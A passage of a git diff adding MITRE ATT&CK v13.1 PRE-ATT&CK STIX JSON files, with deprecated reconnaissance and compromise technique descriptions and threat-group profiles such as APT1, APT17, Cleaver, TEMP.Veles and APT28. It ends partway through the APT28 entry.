target logon/email address format", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1255).\n\nEmail addresses, logon credentials, and other forms of online identification typically share a common format. This makes guessing other credentials within the same domain easier. For example if a known email address is first.last@company.com it is likely that others in the company will have an email in the same format. (Citation: RSA-APTRecon)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1255", + "external_id": "T1255" + }, + { + "source_name": "RSA-APTRecon", + "description": "Rotem Kerner. (2015, October). RECONNAISSANCE: A Walkthrough of the \u201cAPT\u201d Intelligence Gathering Process. Retrieved March 1, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Easily determined and not intended to be protected information. Publicly collected and shared repositories of email addresses exist.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Scraping of known email addresses from the target will likely reveal the target standard for address/username format. This information is easily discoverable.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1032", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--ef6197fd-a58a-4006-bfd6-1d7765d8409d.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--ef6197fd-a58a-4006-bfd6-1d7765d8409d.json new file mode 100644 index 0000000000000000000000000000000000000000..f0f788fc812898003ea6abbfdc90d4daafdc6596 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--ef6197fd-a58a-4006-bfd6-1d7765d8409d.json @@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--078ec5be-f013-4efd-9ed2-31a69f1e266c", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--ef6197fd-a58a-4006-bfd6-1d7765d8409d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Enumerate externally facing software applications technologies, languages, and dependencies", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1261).\n\nSoftware applications will be built using different technologies, languages, and dependencies. This information may reveal vulnerabilities or opportunities to an adversary. (Citation: CommonApplicationAttacks) (Citation: WebApplicationSecurity) (Citation: SANSTop25)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1261", + "external_id": "T1261" + }, + { + "source_name": "CommonApplicationAttacks", + "description": "Paul Ionescu. (2015, April 8). The 10 Most Common Application Attacks in Action. Retrieved March 5, 2017." + }, + { + "source_name": "WebApplicationSecurity", + "description": "Gregory Leonard. (2016, February). Getting Started with Web Application Security. Retrieved March 5, 2017." + }, + { + "source_name": "SANSTop25", + "description": "SANS Institute. (2011, June 27). CWE/SANS TOP 25 Most Dangerous Software Errors. Retrieved March 5, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Impossible to differentiate between an adversary and a normal user when accessing a site to determine the languages/technologies used. If active scanning tools are employed, then the defender has the ability to detect. However, this is typically not acted upon due to the large volume of this type of traffic and it will likely not prompt the defender to take any actionable defense. Defender review of access logs may provide some insight based on trends or patterns.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Basic interaction with the site provides insight into the programming languages/technologies used for a given web site. Additionally many of the active scanning tools will also provide some insight into this information.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1038", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--f4c5d1d9-8f0e-46f1-a9fa-f9a440926046.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--f4c5d1d9-8f0e-46f1-a9fa-f9a440926046.json new file mode 100644 index 0000000000000000000000000000000000000000..b44122b850b5ae8976567fd7d39d58050b3b06e8 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--f4c5d1d9-8f0e-46f1-a9fa-f9a440926046.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--aedd0e9b-a632-4eaf-8b5c-7b15302bf1db", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--f4c5d1d9-8f0e-46f1-a9fa-f9a440926046", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Confirmation of launched compromise achieved", + "description": "**This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.**\n\nUpon successful compromise the adversary may implement methods for confirming success including communication to a command and control server, exfiltration of data, or a verifiable intended effect such as a publicly accessible resource being inaccessible or a web page being defaced. (Citation: FireEye Malware Stages) (Citation: APTNetworkTrafficAnalysis)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1383", + "url": "https://attack.mitre.org/techniques/T1383" + }, + { + "description": "carlota. (2014, November 12). Stages of a Malware Infection. Retrieved April 1, 2017.", + "source_name": "FireEye Malware Stages" + }, + { + "description": "Nart Villeneuve and James Bennett. (2012). Detecting APT Activity with Network Traffic Analysis. Retrieved March 9, 2017.", + "source_name": "APTNetworkTrafficAnalysis" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "compromise" + } + ], + "modified": "2020-03-30T14:17:12.000Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1160", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Certainty of the confirmation of compromise is not guaranteed unless the adversary sees communication to a command and control server, exfiltration of data, or an intended effect occur.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Current commercial tools and sensitive analytics can be used to detect communications to command and control servers or data exfiltration.", + "x_mitre_deprecated": true, + "x_mitre_detectable_by_common_defenses": "Yes" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--fb39384c-00e4-414a-88af-e80c4904e0b8.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--fb39384c-00e4-414a-88af-e80c4904e0b8.json new file mode 100644 index 0000000000000000000000000000000000000000..0b1d1c8610a38eeb0a874e651392496e02049d2f --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--fb39384c-00e4-414a-88af-e80c4904e0b8.json @@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--cd6b13d5-524f-41f0-abf8-d36c5ca05f79", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--fb39384c-00e4-414a-88af-e80c4904e0b8", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Human performs requested action of physical nature", + "description": "**This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.**\n\nThrough social engineering or other methods, an adversary can get users to perform physical actions that provide access to an adversary. This could include providing a password over the phone or inserting a 'found' CD or USB into a system. (Citation: AnonHBGary) (Citation: CSOInsideOutside)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1385", + "url": "https://attack.mitre.org/techniques/T1385" + }, + { + "source_name": "AnonHBGary", + "description": "Bright, P. (2011, February 15). Anonymous speaks: the inside story of the HBGary hack. Retrieved March 9, 2017.", + "url": "https://arstechnica.com/tech-policy/2011/02/anonymous-speaks-the-inside-story-of-the-hbgary-hack/" + }, + { + "description": "Taylor Armerding. (2012, October 25). Line blurs between insider, outsider attacks. Retrieved March 9, 2017.", + "source_name": "CSOInsideOutside" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "compromise" + } + ], + "modified": "2020-10-14T01:53:28.015Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1162", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Ill-informed users insert devices into their network that they randomly find, despite training educating them why this is not a wise idea.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Non-hypersensing environments do not typically collect this level of detailed information.", + "x_mitre_deprecated": true, + "x_mitre_detectable_by_common_defenses": "No" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--fddd81e9-dd3d-477e-9773-4fb8ae227234.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--fddd81e9-dd3d-477e-9773-4fb8ae227234.json new file mode 100644 index 0000000000000000000000000000000000000000..d43d07f840f83b047d6478e1796bccb2e81e3bb5 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--fddd81e9-dd3d-477e-9773-4fb8ae227234.json @@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--7b27afd2-395a-49df-bce1-1eed69fef1a1", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--fddd81e9-dd3d-477e-9773-4fb8ae227234", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Create custom payloads", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1345).\n\nA payload is the part of the malware which performs a malicious action. The adversary may create custom payloads when none exist with the needed capability or when targeting a specific environment. (Citation: APT1)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1345", + "external_id": "T1345" + }, + { + "source_name": "APT1", + "description": "Mandiant. (n.d.). APT1: Exposing One of China\u2019s Cyber Espionage Units. Retrieved March 5, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "It is likely that an adversary will create and develop payloads on inaccessible or unknown networks for OPSEC reasons.", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_difficulty_for_adversary_explanation": "Specialized tools exist for research, development, and testing of virus/malware payloads.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1122", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "build-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--fe421ab9-c8f3-42f7-9ae1-5d6c324cc925.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--fe421ab9-c8f3-42f7-9ae1-5d6c324cc925.json new file mode 100644 index 0000000000000000000000000000000000000000..da91f9b16e52b0a9ec3c4c1adcdc5e86d10d58f8 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--fe421ab9-c8f3-42f7-9ae1-5d6c324cc925.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--783227b6-cdb4-4a6d-be3c-13139c2f3ab0", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--fe421ab9-c8f3-42f7-9ae1-5d6c324cc925", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Analyze application security posture", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1293).\n\nAn adversary can probe a victim's network to determine configurations. The configurations may provide opportunities to route traffic through the network in an undetected or less detectable way. (Citation: Li2014ExploitKits) (Citation: RecurlyGHOST)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1293", + "external_id": "T1293" + }, + { + "source_name": "Li2014ExploitKits", + "description": "Brooks Li. (2014, December 17). What\u2019s New in Exploit Kits in 2014. Retrieved March 6, 2017." + }, + { + "source_name": "RecurlyGHOST", + "description": "Mark Poole. (2015, January 27). GHOST vulnerability (CVE-2015-0235) in popular Linux library glibc allows remote code execution. Retrieved March 6, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "This can be done offline after the data has been collected.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Analyze technical scanning results to identify weaknesses in the configuration or architecture. Many of the common tools highlight these weakness automatically (e.g., software security scanning tools or published vulnerabilities about commonly used libraries).", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1070", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-weakness-identification" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/identity/identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5.json b/cti-ATT-CK-v13.1/pre-attack/identity/identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5.json new file mode 100644 index 0000000000000000000000000000000000000000..0b64de28bfcc9eae26a97849b555ad9b207e1cde --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/identity/identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5.json @@ -0,0 +1,18 @@ +{ + "type": "bundle", + "id": "bundle--2ab539fd-78b4-43e1-8dfe-41a7d942d680", + "spec_version": "2.0", + "objects": [ + { + "id": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "The MITRE Corporation", + "identity_class": "organization", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "identity", + "modified": "2017-06-01T00:00:00.000Z", + "created": "2017-06-01T00:00:00.000Z" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/intrusion-set/intrusion-set--090242d7-73fc-4738-af68-20162f7a5aae.json b/cti-ATT-CK-v13.1/pre-attack/intrusion-set/intrusion-set--090242d7-73fc-4738-af68-20162f7a5aae.json new file mode 100644 index 0000000000000000000000000000000000000000..e19c386eb931aa4b38efbdb5916d51fdc5d412db --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/intrusion-set/intrusion-set--090242d7-73fc-4738-af68-20162f7a5aae.json @@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--25f1515d-ceeb-448b-91fd-d912a91040d0", + "spec_version": "2.0", + "objects": [ + { + "type": "intrusion-set", + "id": "intrusion-set--090242d7-73fc-4738-af68-20162f7a5aae", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "APT17", + "description": "[APT17](https://attack.mitre.org/groups/G0025) is a China-based threat group that has conducted network intrusions against U.S. government entities, the defense industry, law firms, information technology companies, mining companies, and non-government organizations. (Citation: FireEye APT17)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0025", + "external_id": "G0025" + }, + { + "source_name": "APT17", + "description": "(Citation: FireEye APT17)" + }, + { + "source_name": "Deputy Dog", + "description": "(Citation: FireEye APT17)" + }, + { + "url": "https://www2.fireeye.com/rs/fireye/images/APT17_Report.pdf", + "description": "FireEye Labs/FireEye Threat Intelligence. (2015, May 14). Hiding in Plain Sight: FireEye and Microsoft Expose Obfuscation Tactic. Retrieved January 22, 2016.", + "source_name": "FireEye APT17" + } + ], + "aliases": [ + "APT17", + "Deputy Dog" + ], + "modified": "2020-10-13T22:33:14.018Z", + "created": "2017-05-31T21:31:57.307Z", + "x_mitre_version": "1.1" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/intrusion-set/intrusion-set--23b6a0f5-fa95-46f9-a6f3-4549c5e45ec8.json b/cti-ATT-CK-v13.1/pre-attack/intrusion-set/intrusion-set--23b6a0f5-fa95-46f9-a6f3-4549c5e45ec8.json new file mode 100644 index 0000000000000000000000000000000000000000..bf2851b2e17b8c0a40ab9b6d7c2c104727e98558 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/intrusion-set/intrusion-set--23b6a0f5-fa95-46f9-a6f3-4549c5e45ec8.json @@ -0,0 +1,39 @@ +{ + "type": "bundle", + "id": "bundle--019d9433-1f4d-4b2b-9619-e44daf33d4db", + "spec_version": "2.0", + "objects": [ + { + "type": "intrusion-set", + "id": "intrusion-set--23b6a0f5-fa95-46f9-a6f3-4549c5e45ec8", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Night Dragon", + "description": "[Night Dragon](https://attack.mitre.org/groups/G0014) is a campaign name for activity involving a threat group that has conducted activity originating primarily in China. (Citation: McAfee Night Dragon)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0014", + "external_id": "G0014" + }, + { + "source_name": "Night Dragon", + "description": "(Citation: McAfee Night Dragon)" + }, + { + "source_name": "McAfee Night Dragon", + "description": "McAfee\u00ae Foundstone\u00ae Professional Services and McAfee Labs\u2122. (2011, February 10). Global Energy Cyberattacks: \u201cNight Dragon\u201d. Retrieved February 19, 2018.", + "url": "https://securingtomorrow.mcafee.com/wp-content/uploads/2011/02/McAfee_NightDragon_wp_draft_to_customersv1-1.pdf" + } + ], + "aliases": [ + "Night Dragon" + ], + "modified": "2020-10-15T00:54:00.656Z", + "created": "2017-05-31T21:31:51.643Z", + "x_mitre_version": "1.3" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/intrusion-set/intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662.json b/cti-ATT-CK-v13.1/pre-attack/intrusion-set/intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662.json new file mode 100644 index 0000000000000000000000000000000000000000..0c060302aafe071043db5e27b7186ba6b4d932d8 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/intrusion-set/intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662.json @@ -0,0 +1,59 @@ +{ + "type": "bundle", + "id": "bundle--c223e6c8-a288-4071-9f54-9cb24c66e0bc", + "spec_version": "2.0", + "objects": [ + { + "type": "intrusion-set", + "id": "intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "APT1", + "description": "[APT1](https://attack.mitre.org/groups/G0006) is a Chinese threat group that has been attributed to the 2nd Bureau of the People\u2019s Liberation Army (PLA) General Staff Department\u2019s (GSD) 3rd Department, commonly known by its Military Unit Cover Designator (MUCD) as Unit 61398. (Citation: Mandiant APT1)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0006", + "external_id": "G0006" + }, + { + "source_name": "APT1", + "description": "(Citation: Mandiant APT1)" + }, + { + "source_name": "Comment Crew", + "description": "(Citation: Mandiant APT1)" + }, + { + "source_name": "Comment Group", + "description": "(Citation: Mandiant APT1)" + }, + { + "source_name": "Comment Panda", + "description": "(Citation: CrowdStrike Putter Panda)" + }, + { + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf", + "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. Retrieved July 18, 2016.", + "source_name": "Mandiant APT1" + }, + { + "url": "http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf", + "description": "Crowdstrike Global Intelligence Team. (2014, June 9). CrowdStrike Intelligence Report: Putter Panda. Retrieved January 22, 2016.", + "source_name": "CrowdStrike Putter Panda" + } + ], + "aliases": [ + "APT1", + "Comment Crew", + "Comment Group", + "Comment Panda" + ], + "modified": "2020-10-22T18:35:55.290Z", + "created": "2017-05-31T21:31:47.955Z", + "x_mitre_version": "1.3" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/intrusion-set/intrusion-set--8f5e8dc7-739d-4f5e-a8a1-a66e004d7063.json b/cti-ATT-CK-v13.1/pre-attack/intrusion-set/intrusion-set--8f5e8dc7-739d-4f5e-a8a1-a66e004d7063.json new file mode 100644 index 0000000000000000000000000000000000000000..4426eef26935b8b88bc97652c18407a06cae619f --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/intrusion-set/intrusion-set--8f5e8dc7-739d-4f5e-a8a1-a66e004d7063.json @@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--dd0362fe-39ff-4025-9dbd-33191b2cc735", + "spec_version": "2.0", + "objects": [ + { + "type": "intrusion-set", + "id": "intrusion-set--8f5e8dc7-739d-4f5e-a8a1-a66e004d7063", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Cleaver", + "description": "[Cleaver](https://attack.mitre.org/groups/G0003) is a threat group that has been attributed to Iranian actors and is responsible for activity tracked as Operation Cleaver. (Citation: Cylance Cleaver) Strong circumstantial evidence suggests Cleaver is linked to Threat Group 2889 (TG-2889). (Citation: Dell Threat Group 2889)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0003", + "external_id": "G0003" + }, + { + "source_name": "Cleaver", + "description": "(Citation: Cylance Cleaver)" + }, + { + "source_name": "Threat Group 2889", + "description": "(Citation: Dell Threat Group 2889)" + }, + { + "source_name": "TG-2889", + "description": "(Citation: Dell Threat Group 2889)" + }, + { + "source_name": "Cylance Cleaver", + "description": "Cylance. (2014, December). Operation Cleaver. Retrieved September 14, 2017.", + "url": "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" + }, + { + "url": "http://www.secureworks.com/cyber-threat-intelligence/threats/suspected-iran-based-hacker-group-creates-network-of-fake-linkedin-profiles/", + "description": "Dell SecureWorks. (2015, October 7). Suspected Iran-Based Hacker Group Creates Network of Fake LinkedIn Profiles. Retrieved January 14, 2016.", + "source_name": "Dell Threat Group 2889" + } + ], + "aliases": [ + "Cleaver", + "Threat Group 2889", + "TG-2889" + ], + "modified": "2020-10-15T16:59:26.732Z", + "created": "2017-05-31T21:31:46.390Z", + "x_mitre_version": "1.2" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/intrusion-set/intrusion-set--9538b1a4-4120-4e2d-bf59-3b11fcab05a4.json b/cti-ATT-CK-v13.1/pre-attack/intrusion-set/intrusion-set--9538b1a4-4120-4e2d-bf59-3b11fcab05a4.json new file mode 100644 index 0000000000000000000000000000000000000000..ef12f514c026a3d76e9bb614f6d3864d328ced59 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/intrusion-set/intrusion-set--9538b1a4-4120-4e2d-bf59-3b11fcab05a4.json @@ -0,0 +1,69 @@ +{ + "type": "bundle", + "id": "bundle--ea9487f2-c86c-40c9-b68b-210ef5b3cf1f", + "spec_version": "2.0", + "objects": [ + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "url": "https://attack.mitre.org/groups/G0088", + "source_name": "mitre-attack", + "external_id": "G0088" + }, + { + "source_name": "TEMP.Veles", + "description": "(Citation: FireEye TRITON 2019)" + }, + { + "source_name": "XENOTIME", + "description": "The activity group XENOTIME, as defined by Dragos, has overlaps with activity reported upon by FireEye about TEMP.Veles as well as the actors behind TRITON.(Citation: Dragos Xenotime 2018)(Citation: Pylos Xenotime 2019)(Citation: FireEye TRITON 2019)(Citation: FireEye TEMP.Veles 2018 )" + }, + { + "description": "Miller, S, et al. (2019, April 10). TRITON Actor TTP Profile, Custom Attack Tools, Detections, and ATT&CK Mapping. Retrieved April 16, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html", + "source_name": "FireEye TRITON 2019" + }, + { + "description": "FireEye Intelligence . (2018, October 23). TRITON Attribution: Russian Government-Owned Lab Most Likely Built Custom Intrusion Tools for TRITON Attackers. Retrieved April 16, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html ", + "source_name": "FireEye TEMP.Veles 2018" + }, + { + "source_name": "FireEye TEMP.Veles JSON April 2019", + "url": "https://www.fireeye.com/content/dam/fireeye-www/blog/files/TRITON_Appendix_C.html", + "description": "Miller, S., et al. (2019, April 10). TRITON Appendix C. Retrieved April 29, 2019." + }, + { + "description": "Dragos, Inc.. (n.d.). Xenotime. Retrieved April 16, 2019.", + "url": "https://dragos.com/resource/xenotime/", + "source_name": "Dragos Xenotime 2018" + }, + { + "description": "Slowik, J.. (2019, April 12). A XENOTIME to Remember: Veles in the Wild. Retrieved April 16, 2019.", + "url": "https://pylos.co/2019/04/12/a-xenotime-to-remember-veles-in-the-wild/", + "source_name": "Pylos Xenotime 2019" + }, + { + "source_name": "FireEye TEMP.Veles 2018 ", + "url": "https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html ", + "description": "FireEye Intelligence . (2018, October 23). TRITON Attribution: Russian Government-Owned Lab Most Likely Built Custom Intrusion Tools for TRITON Attackers. Retrieved April 16, 2019." + } + ], + "name": "TEMP.Veles", + "description": "[TEMP.Veles](https://attack.mitre.org/groups/G0088) is a Russia-based threat group that has targeted critical infrastructure. The group has been observed utilizing TRITON, a malware framework designed to manipulate industrial safety systems.(Citation: FireEye TRITON 2019)(Citation: FireEye TEMP.Veles 2018)(Citation: FireEye TEMP.Veles JSON April 2019)", + "type": "intrusion-set", + "id": "intrusion-set--9538b1a4-4120-4e2d-bf59-3b11fcab05a4", + "aliases": [ + "TEMP.Veles", + "XENOTIME" + ], + "modified": "2020-10-04T23:31:36.937Z", + "created": "2019-04-16T15:14:38.533Z", + "x_mitre_version": "1.2" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/intrusion-set/intrusion-set--bef4c620-0787-42a8-a96d-b7eb6e85917c.json b/cti-ATT-CK-v13.1/pre-attack/intrusion-set/intrusion-set--bef4c620-0787-42a8-a96d-b7eb6e85917c.json new file mode 100644 index 0000000000000000000000000000000000000000..626d86a1aa9cf0cd1e0caac6226381bb49791692 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/intrusion-set/intrusion-set--bef4c620-0787-42a8-a96d-b7eb6e85917c.json @@ -0,0 +1,195 @@ +{ + "type": "bundle", + "id": "bundle--92b2fd69-4f54-47bd-8d13-8b77814f460e", + "spec_version": "2.0", + "objects": [ + { + "type": "intrusion-set", + "id": "intrusion-set--bef4c620-0787-42a8-a96d-b7eb6e85917c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "APT28", + "description": "[APT28](https://attack.mitre.org/groups/G0007) is a threat group that has been attributed to Russia's General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS) military unit 26165.(Citation: NSA/FBI Drovorub August 2020) This group has been active since at least 2004.(Citation: DOJ GRU Indictment Jul 2018) (Citation: Ars Technica GRU indictment Jul 2018) (Citation: Crowdstrike DNC June 2016) (Citation: FireEye APT28) (Citation: SecureWorks TG-4127) (Citation: FireEye APT28 January 2017) (Citation: GRIZZLY STEPPE JAR) (Citation: Sofacy DealersChoice) (Citation: Palo Alto Sofacy 06-2018) (Citation: Symantec APT28 Oct 2018) (Citation: ESET Zebrocy May 2019)\n\n[APT28](https://attack.mitre.org/groups/G0007) reportedly compromised the Hillary Clinton campaign, the Democratic National Committee, and the Democratic Congressional Campaign Committee in 2016 in an attempt to interfere with the U.S. presidential election. (Citation: Crowdstrike 